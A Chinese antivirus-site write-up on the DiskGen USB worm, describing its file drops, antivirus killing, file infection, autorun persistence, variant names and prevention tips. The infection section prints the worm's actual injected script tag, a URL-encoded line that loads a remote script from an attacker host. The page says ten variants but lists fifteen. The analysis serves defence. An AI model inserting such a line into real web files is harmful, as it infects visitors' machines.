磁碟机病毒专杀_360蠕虫病毒专杀工具_电脑驱动病毒专杀工具

病毒名称： 磁碟机病毒

病毒名称英文：Worm.DiskGen

病毒类型：感染型

危险级别：★★★☆

传播方式：U盘

受影响的系统： Windows 2000, Windows XP, Windows Server 2003

未受影响的系统：Windows 3.x, Macintosh, Unix, Linux

1 破坏本机杀毒软件运行，删除本机杀毒软件服务、驱动等。

2 感染本机 .exe, .htm, .html, .js, .rar, .zip文件。

3 释放DLL文件，注册COM组件，弹出广告，下载其他病毒、木马。

4 中毒后系统无法进入安全模式、组策略功能也被禁用。

1 病毒首先释放以下文件到X:\WINDOWS\system32\com文件夹下：

lsass.exe , smss.exe, netcfg.dll, netcfg.000

释放文件dnsq.dll到X:\WINDOWS\system32文件夹下。

2 启动lsass.exe，smss.exe进程，感染文件。然后加载netcfg.dll，并全局注入dnsq.dll。

3 dnsq.dll文件负责监视杀毒软件及工具的运行，如果发现就将其关闭，关且它还监控病毒进程lsass.exe和smss.exe。

4 该病病毒会感染三种类型的文件：

1）网页文件：.htm, .html, .js

感染方法：在文件尾部追加字符串document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>");或字符串<ScRiPt src="%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></sCrIpT>

2）可执行程序：.exe

被感染的exe文件有三个部分组成：

a）加了被感染程序图标的病毒体。

b）被加密的原程序。

c）加密的病毒体。

3）压缩文件：.rar, .zip

将压缩包内文件解压，并感染，再打包。磁碟机病毒专杀

5 在每个磁盘分区的根目录下生成AutoRun.Inf、pagefile.pif和~.exe.*.exe文件，实现死灰复燃。在“开始”菜单的启动项中生成~.exe.*.exe文件，其中*为一串随机数字。

6 破坏安全模式、删除注册表中“显示隐藏文件属性”键值。

目前SanLen磁碟机病毒专杀共可清除十个种磁碟机病毒变种，即：

Worm.Win32.DiskGen.ca

Worm.Win32.DiskGen.ci

Worm.Win32.DiskGen.ex

Worm.Win32.DiskGen.gfh

Worm.Win32.DiskGen.u

Worm.Win32.DiskGen.vin

Worm.Win32.DiskGen.vio

Worm.Win32.DiskGen.vip

Worm.Win32.DiskGen.viq

Worm.Win32.DiskGen.xx

Worm.Virus.Win32.DiskGen.dr

Worm.Virus.Win32.DiskGen.ed

Worm.Virus.Win32.DiskGen.ez

Worm.Virus.Win32.DiskGen.es

Worm.Virus.Win32.DiskGen.mis

1 关闭U盘的“自动播放功能”。运行可执行程序时先进行杀毒。

2 及时升级系统漏洞。

3 将病毒库升级到最新，并开启防病毒软件的实时监控。磁碟机病毒专杀

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-24146-1.html